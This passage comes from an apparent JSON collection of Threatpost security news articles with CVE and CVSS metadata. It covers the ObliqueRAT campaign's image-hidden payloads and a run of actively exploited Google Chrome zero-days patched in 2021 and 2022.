ObliqueRAT operators to avoid detection during the malware\u2019s targeting of various organizations in South Asia \u2014 where the goal is to ultimately sends victims an email with malicious Microsoft Office documents, which, once clicked, fetch the payloads and ultimately exfiltrate various data from the victim.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections,\u201d said Asheer Malhotra, researcher with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html>). \u201cModifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms.\u201d\n\n## **What is the ObliqueRAT Malware?**\n\n[The known activity for ObliqueRAT](<https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html>) dates back to November 2019, part of a campaign targeting entities in Southeast Asia and uncovered by Cisco Talos researchers in February 2020. ObliqueRAT operators have always used emails with malicious attachments as an initial infection vector. Generally the infection chain uses an initial executable, which acts as a dropper for ObliqueRAT itself.\n\nOnce it infected systems, ObliqueRAT exfiltrates various information, including system data, a list of drives and a list of running processes.\n\n## **ObliqueRAT Malware Evolution**\n\nThe newly discovered ObliqueRAT attack chain was part of a campaign that started in May last year \u2013 but which was only recently uncovered by researchers. In addition to the use of URL redirects, the payloads themselves have also been given an update, now consisting of seemingly benign bitmap image files (BMP).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102115/ObliqueRAT-Payloads.png>)\n\nThe new attack chain used by ObliqueRAT. Credit: Cisco Talos\n\nThe image files contain both legitimate image data and malicious executable bytes concealed in the image data, said researchers. Threatpost has reached out to Cisco Talos for further information on the compromised websites and the images used as part of the attack.\n\nThis is a well-known tactic used by [threat actors, called steganography](<https://threatpost.com/steganography-pinpoint-attacks-industrial-targets/156151/>). Attackers hide malware in image files as a way to circumvent detection. That\u2019s because many filters and gateways [let image file formats pass without too much scrutiny](<https://threatpost.com/rare-steganography-hack-can-compromise-fully-patched-websites/146701/>).\n\nThe initial email sent to victims contains malicious documents with new macros, which redirect users to the malicious URLs containing these payloads. The malicious macros consequently download the BMP files, and the ObliqueRAT payload is extracted to the disk.\n\nThere are slight variations that have been seen in real-world attacks. One instance of a malicious document that researchers found \u201cuses a similar technique, with the difference being that the payload hosted on the compromised website is a BMP image containing a .ZIP file that contains ObliqueRAT payload,\u201d said Malhotra. \u201cThe malicious macros are responsible for extracting the .ZIP and subsequently the ObliqueRAT payload on the endpoint.\u201d\n\nDuring the course of their investigation, researchers also discovered three previously used but never-before-seen payloads for ObliqueRAT, which showed how the malware authors have made changes over time. For instance, one of the versions created in September added new file enumeration and stealing capabilities, as well as expanded the payload\u2019s functionalities to include the ability to take webcam and desktop screenshots and recordings.\n\n## **ObliqueRAT: Hiding From Detection, Improved Persistence**\n\nThis updated payload delivery technique gives attackers a leg up in sidestepping detection, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102156/ObliqueRAT-Payloads-2.png>)\n\nThe evolution of ObliqueRAT\u2019s payloads. Credit: Cisco Talos\n\n\u201cIt is highly likely that these changes are in response to previous disclosures to achieve evasion for these new campaigns,\u201d they said. \u201cThe usage of compromised websites is another attempt at detection evasion.\u201d\n\nThe macros also have adopted a new tactic for achieving reboot persistence for the ObliqueRAT payloads. This is accomplished by creating a shortcut (.URL file extension) in the infected user\u2019s Startup directory, said researchers. Once the computer reboots, the payloads will then still be able to run.\n\n## **RevengeRAT: Researchers Link With \u2018Low Confidence\u2019**\n\nResearchers said that they observed overlaps in the command-and-control (C2) server infrastructure between ObliqueRAT and a RevengeRAT campaign. However, they only made the connection with \u201clow confidence\u201d due to lack of any other more substantial evidence.\n\nRevengeRAT is a [commodity malware family](<https://threatpost.com/malware-dropper-dual-rats/150271/>) that [has been used](<https://threatpost.com/iranian-apt33-shakes-up-cyberespionage-tactics/146041/>) by Iran-linked, espionage-focused [threat group APT33](<https://threatpost.com/apt33-mounts-targeted-botnet-attacks-us/150248/>) in the past. The RAT collects and exfiltrates information from the victim\u2019s system.\n\nPreviously, researchers also made links between ObliqueRAT and Crimson RAT. The functionalities of Crimson RAT [include stealing credentials](<https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/>) from victims\u2019 browsers, capturing screenshots, collecting antivirus software information, and listing the running processes, drives and directories from victim machines. Researchers said that the two RATs shared \u201csimilar maldocs and macros\u201d in previous ObliqueRAT campaigns.\n\n\u201cThis malware has links to the Transparent Tribe group that has historically targeted entities in South Asia,\u201d Malhotra told Threatpost. \u201cAs is the case with most suspected APT campaigns, this campaign is also low volume. A low-volume campaign has better chances of remaining undiscovered for longer periods of time thus increasing the chances of success for the attackers.\u201d\n", "cvss3": {}, "published": "2021-03-02T17:06:51", "type": "threatpost", "title": "Compromised Website Images Camouflage ObliqueRAT Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-02T17:06:51", "id": "THREATPOST:CF9E25BD324C5940B0795721CA134155", "href": "https://threatpost.com/website-images-obliquerat-malware/164395/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-14T15:21:25", "description": "Google has addressed two zero-day security bugs that are being actively exploited in the wild.\n\nAs part of the internet giant\u2019s latest stable channel release (version 93.0.4577.82 for Windows, Mac and Linux), it fixed 11 total vulnerabilities, all of them rated high-severity. The two zero days are tracked as CVE-2021-30632 and CVE-2021-30633.\n\n\u201cGoogle is aware that exploits for [these] exist in the wild,\u201d the company said in its short website notice on the update, [issued Monday](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nGoogle is restricting any technical details \u201cuntil a majority of users are updated with a fix,\u201d it said. The vulnerabilities were reported anonymously, precluding any gleaning of details from the researcher who found them. Here\u2019s what we know:\n\n * CVE-2021-30632: Out of bounds write in V8 JavaScript Engine; and\n * CVE-2021-30633: Use after free in the IndexedDB API.\n\nOut-of-bounds write flaws [can result in](<https://cwe.mitre.org/data/definitions/787.html>) corruption of data, a crash or code execution. Use-after-free issues [can result in](<https://cwe.mitre.org/data/definitions/416.html>) any number of attack types, ranging from the corruption of valid data to the execution of arbitrary code. Both bugs have TBD bug-bounty awards attached to them and were reported on Sept. 8.\n\nV8 is Google\u2019s open-source, high-performance JavaScript and WebAssembly engine for Chrome and Chromium-based browsers. It translates JavaScript code into a more efficient machine code instead of using an interpreter, which speeds up the web browser. Since this vulnerable components is not specific to Google Chrome, it\u2019s a good bet that other browsers are affected by the bug as well.\n\nIndexedDB, meanwhile, allows users to persistently store large amounts of structured data client-side, inside their browsers. The API is a JavaScript application programming interface provided by web browsers for managing these NoSQL databases. It\u2019s a standard maintained by the World Wide Web Consortium.\n\n\u201cBrowser bugs discovered from exploitation in the wild are among the most significant security threats,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cNow that they are patched, exploitation will ramp up. That said, almost 20 years on and we haven\u2019t made web browsing safe shows that the rapid embrace of technology continues to leave users exposed to criminals and nation-state actors. Everyone wants to learn how to hack, too few people are working on defense.\u201d\n\nThe other nine bugs addressed by Google are as follows:\n\n * CVE-2021-30625: Use after free in Selection API. _Reported by Marcin Towalski of Cisco Talos on 2021-08-06_\n * CVE-2021-30626: Out of bounds memory access in ANGLE. _Reported by Jeonghoon Shin of Theori on 2021-08-18_\n * CVE-2021-30627: Type Confusion in Blink layout. _Reported by Aki Helin of OUSPG on 2021-09-01_\n * CVE-2021-30628: Stack buffer overflow in ANGLE. _Reported by Jaehun Jeong(@n3sk) of Theori on 2021-08-18_\n * CVE-2021-30629: Use after free in Permissions. _Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi\u2019anxin Group on 2021-08-26_\n * CVE-2021-30630: Inappropriate implementation in Blink. _Reported by SorryMybad (@S0rryMybad) of Kunlun Lab on 2021-08-30_\n * CVE-2021-30631: Type Confusion in Blink layout. _Reported by Atte Kettunen of OUSPG on 2021-09-06_\n\nKevin Dunne, president at Pathlock, pointed out that Google has patched plenty of zero-days already this year \u2013 eight prior to the latest two, to be exact \u2013 and he said to expect more.\n\n## **10th Zero-Day in 2021 for Google**\n\n\u201cToday, Google released a patch for its tenth [and ninth] zero-day exploit of the year,\u201d Dunne said in an email to media. \u201cThis milestone highlights the emphasis that bad actors are putting on browser exploits, with Chrome becoming a clear favorite, allowing a streamlined way to gain access to millions of devices regardless of OS.\n\n\u201cWe expect to see continued zero-day exploits in the wild,\u201d he added.\n\nThe other zero days discovered so far in 2021 are as follows, many of them in the V8 engine:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 (February)\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 (March)\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 (March)\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 (April)\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 (April, later [used in Windows attacks](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>))\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013 (June)\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 (June)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 (July)\n\n\u201cGoogle\u2019s commitment to patching these exploits quickly is commendable, as they operate Google Chrome as freeware and therefore are the sole entity who can provide these updates,\u201d Dunne wrote. \u201cGoogle is committed to providing Chrome as a free browser, as it is a critical entry point for other businesses such as Google Search and Google Workspace.\u201d\n\nThe news comes as Apple [rushed a fix](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) for a zero-click zero-day exploit targeting iMessaging. It\u2019s allegedly been used to illegally spy on Bahraini activists with NSO Group\u2019s Pegasus spyware, according to researchers.\n\nMicrosoft is also expected to release its monthly Patch Tuesday set of updates today, so we\u2019ll see if there are yet more zero-day exploits to worry about.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T15:03:41", "type": "threatpost", "title": "Pair of Google Chrome Zero-Day Bugs Actively Exploited", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30625", "CVE-2021-30626", "CVE-2021-30627", "CVE-2021-30628", "CVE-2021-30629", "CVE-2021-30630", "CVE-2021-30631", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T15:03:41", "id": "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "href": "https://threatpost.com/google-chrome-zero-day-exploited/169442/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-15T21:47:28", "description": "Google on Monday issued 11 security fixes for its Chrome browser, including a high-severity zero-day bug that\u2019s actively being jumped on by attackers in the wild.\n\nIn a brief update, Google [described](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>) the weakness, tracked as [CVE-2022-0609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609>), as a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in Chrome\u2019s Animation component. This kind of flaw can lead to all sorts of misery, ranging from the corruption of valid data to the execution of arbitrary code on vulnerable systems. Such flaws can also be used to escape the browser\u2019s security sandbox.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2022-0609 exists in the wild,\u201d according to its security update.\n\nChrome users can fix it straight away, though, by going into the Chrome menu &gt; Help &gt; About Google Chrome.\n\nGiven that the zero day is under active attack, updating Chrome should be done ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15125804/Chrome-zero-day-e1644947947750.png>)\n\nChrome security updates. Source: Google.\n\nCredit for the Animation zero day goes to Adam Weidemann and Cl\u00e9ment Lecigne, both from Google\u2019s Threat Analysis Group (TAG).\n\nMonday\u2019s update also plastered over four other high-severity use-after-free flaws found in Chrome\u2019s Webstore API, File Manager, [ANGLE](<https://en.wikipedia.org/wiki/ANGLE_\\(software\\)>) and GPU. As well, the company addressed a high-severity integer overflow in [Mojo](<https://chromium.googlesource.com/chromium/src/+/main/docs/mojo_and_services.md>), plus a high-severity h\u200beap buffer overflow in Tab Groups. Finally, Google patched a medium-severity issue with inappropriate implementation in Gamepad API.\n\n## And So It Begins\n\nThis is Chrome\u2019s first zero day of the year, and more are sure to follow. But at least we\u2019ve made it into the new-ish year 10 more days than we managed in 2021, when the first bug to hit arrived on Feb. 4.\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, a vulnerability in its V8 open-source web engine.\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 March 2, a flaw in the Audio component of Google Chrome.\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 March 12, a use-after-free flaw in Blink, [the browser engine for Chrome](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>) that was developed as part of the Chromium project.\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 April 13, a remote-code execution issue.\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 in Google Chrome that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013- June 9, a type confusion bug within Google\u2019s V8 open-source JavaScript and WebAssembly engine.\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 June 17, a use-after-free bug.\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, type confusion in V8.\n * [CVE-2021-30632 and CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8 and a use-after-free bug in the IndexedDB API, respectively.\n * [CVE-2021-37973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37973>) \u2013 Sept. 24, a use-after-free flaw in Portals.\n * [CVE-2021-37976 and CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, an information leak in core and a use-after-free bug in V8, respectively.\n * [CVE-2021-38000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38000>) and [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an issue with Insufficient validation of untrusted input in Intents in Google Chrome on Android, and an inappropriate implementation in V8 respectively.\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use after free in V8.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T18:33:28", "type": "threatpost", "title": "Chrome Zero-Day Under Active Attack: Patch ASAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-02-15T18:33:28", "id": "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "href": "https://threatpost.com/google-chrome-zero-day-under-attack/178428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-04T21:58:01", "description": "Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.\n\nThe vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,\u201d according to Google [on Tuesday](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>). \u201cThis will roll out over the coming days/weeks.\u201d\n\n## Google Chrome: Actively-Exploited Security Flaw\n\nThe actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which [has previously been found](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use \u2013 between the time it is created and destroyed.\n\nBeyond Google noting that it \u201cis aware of reports that an exploit for CVE-2021-21166 exists in the wild,\u201d further information about the glitch is unavailable. That\u2019s because \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to Google.\n\nThe flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).\n\n## Other Chrome Security High-Severity Flaws\n\nDetails around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.\n\nTwo other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).\n\n## **Google Chrome Security Updates**\n\nChrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:\n\n * Google Chrome users can go to chrome://settings/help by clicking Settings &gt; About Chrome\n * If an update is available Chrome will notify users and then start the download process\n * Users can then relaunch the browser to complete the update\n\nThe fixes come after Google in February [warned of a zero-day vulnerability](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) in its V8 open-source web engine that\u2019s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) [urged Windows, macOS and Linux users](<https://threatpost.com/firefox-chrome-edge-bugs-system-hijacking/162873/>) of Google\u2019s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.\n\nAnd in December, Google updated Chrome to fix four bugs with a severity rating of \u201chigh\u201d and eight overall. [Three were use-after-free flaws](<https://threatpost.com/google_chrome_bugs_patched/161907/>), which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n", "cvss3": {}, "published": "2021-03-03T21:17:14", "type": "threatpost", "title": "Google Patches Actively Exploited Flaw in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15995", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166"], "modified": "2021-03-03T21:17:14", "id": "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "href": "https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-30T16:18:23", "description": "Google has updated its Stable channel for the desktop version of Chrome, to address a zero-day security vulnerability that\u2019s being actively exploited in the wild.\n\nThe bug, tracked as CVE-2022-1096, is a type-confusion issue in the V8 JavaScript engine, which is an open-source engine used by Chrome and Chromium-based web browsers. Type confusion, as Microsoft has [laid out](<https://www.microsoft.com/security/blog/2015/06/17/understanding-type-confusion-vulnerabilities-cve-2015-0336/>) in the past, occurs \u201cwhen a piece of code doesn\u2019t verify the type of object that is passed to it, and uses it blindly without type-checking, it leads to type confusion\u2026Also with type confusion, wrong function pointers or data are fed into the wrong piece of code. In some circumstances this can lead to code execution.\u201d\n\nGoogle didn\u2019t provide additional technical details, as is its wont, but did say that it was \u201caware that an exploit for CVE-2022-1096 exists in the wild.\u201d An anonymous researcher was credited with finding the issue, which is labeled \u201chigh-severity\u201d (no CVSS score was given).\n\nThe lack of any further information is a source of frustration to some.\n\n\u201cAs a defender, I really wish it was more clear what this security fix is,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cI get permission-denied errors or \u2018need to authenticate,\u2019 so I can\u2019t make decisions or advise my clients. A little more transparency would be beneficial and appreciated.\u201d\n\n## **Emergency Patch; Active Exploit**\n\nThe internet giant has updated the Stable channel to 99.0.4844.84 for Chrome for Windows, Mac and Linux, according to the its [security advisory](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>). Microsoft, which offers the Chromium-based Edge browser, also issued its [own advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>). It\u2019s unclear whether other offerings built in V8, such as the JavaScript runtime environment Node.js, are also affected.\n\nThe patch was issued on an emergency basis, likely due to the active exploit that\u2019s circulating, researchers noted.\n\n\u201cThe first thing which stood out to me about this update is that it only fixes a single issue,\u201d Casey Ellis, founder and CTO at Bugcrowd, noted by email. \u201cThis is pretty unusual for Google. They typically fix multiple issues in these types of releases, which suggests that they are quite concerned and very motivated to see fixes against CVE-2022-1096 applied across their user-base ASAP.\u201d\n\nHe also commented on the speed of the patch being rolled out.\n\n\u201cThe vulnerability was only reported on the 23rd of March, and while Google\u2019s Chrome team do tend to be fairly prompt in developing, testing and rolling patches, the idea of a patch for software deployed as widely deployed as Chrome in 48 hours is something is continue to be impressed by,\u201d he said. \u201cSpeculatively, I\u2019d suggest that the vulnerability has been discovered via detection of active exploitation in the wild, and the combination of impact and potentially the malicious actors currently using it contributed to the fast turnaround.\u201d\n\n## **V8 Engine in the Crosshairs**\n\nThe V8 engine has been plagued with security bugs and targeted by cyberattackers many times in the last year:\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, an unnamed type of bug in V8\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013- June 9, a type-confusion bug within V8 (also under active attack as a zero-day)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, another type-confusion bug in V8.\n * [CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8\n * [CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, a use-after-free bug in V8 (also attacked as a zero-day)\n * [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an inappropriate implementation in V8\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use-after-free bug in V8.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:14:30", "type": "threatpost", "title": "Google Chrome Bug Actively Exploited as Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0336", "CVE-2021-21148", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30563", "CVE-2021-30633", "CVE-2021-37975", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-1096"], "modified": "2022-03-30T16:14:30", "id": "THREATPOST:45B63C766965F5748AEC30DE709C8003", "href": "https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T22:18:00", "description": "Microsoft jumped on 50 vulnerabilities in this month\u2019s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code \u2013 Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nFive of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft 